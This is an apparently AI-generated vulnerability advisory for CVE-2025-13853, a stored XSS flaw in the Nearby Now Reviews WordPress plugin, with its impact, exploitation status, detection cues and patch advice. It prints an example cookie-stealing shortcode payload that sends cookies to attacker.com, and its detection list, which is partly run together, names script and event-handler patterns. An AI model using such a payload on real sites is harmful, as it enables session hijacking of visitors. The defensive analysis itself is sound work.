
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13853 is a Stored Cross-Site Scripting (XSS) vulnerability in the Nearby Now Reviews plugin for WordPress. It affects all versions up to and including 5.2, and was disclosed on January 9, 2026, with Wordfence as the reporting CNA. The flaw allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts via the data_tech parameter of the nn-tech shortcode. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).
The root cause is insufficient input sanitization and output escaping of the data_tech parameter within the nn-tech shortcode handler, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An authenticated contributor can embed a malicious shortcode containing arbitrary JavaScript into a WordPress post or page; when any user visits that page, the injected script executes in their browser context. The vulnerable code path is visible in the plugin source at line 160 of nn-reviews.php (WordPress Plugin Trac, Wordfence).
Successful exploitation allows injected scripts to execute in the browsers of all users who visit the compromised page, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, phishing redirects). Because the scope is changed (S:C in the CVSS vector), the impact extends beyond the plugin itself to the broader WordPress site and its visitors. Availability is not directly affected, but persistent script injection can degrade user trust and enable further attacks such as account takeover (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13853. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).
[nn-tech data_tech="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].data_tech value is stored in the database.wp-admin/post.php or REST API endpoints containing nn-tech shortcode with suspicious data_tech values including <script>, javascript:, or encoded variants.wp_posts table entries containing [nn-tech data_tech= with embedded script tags or event handlers (e.g., onerror=, onload=).nn-tech shortcode, potentially carrying cookie or session data in query parameters.Site administrators should update the Nearby Now Reviews plugin to version 5.3 or later, which contains the fix for insufficient input sanitization and output escaping (Wordfence). As an interim workaround, restrict Contributor-level user registration and post publishing capabilities, or disable the plugin entirely until patching is feasible. Web application firewalls (WAFs) with XSS filtering rules, such as those provided by Wordfence, can help block exploitation attempts while the patch is applied.
Wordfence disclosed the vulnerability through their threat intelligence platform and assigned the CVE. The vulnerability received routine aggregation coverage from security databases including VulDB, Vulners, and CIRCL, with a brief mention on Bluesky via automated CVE feeds. No notable researcher commentary or significant media coverage beyond standard vulnerability tracking has been identified for this CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."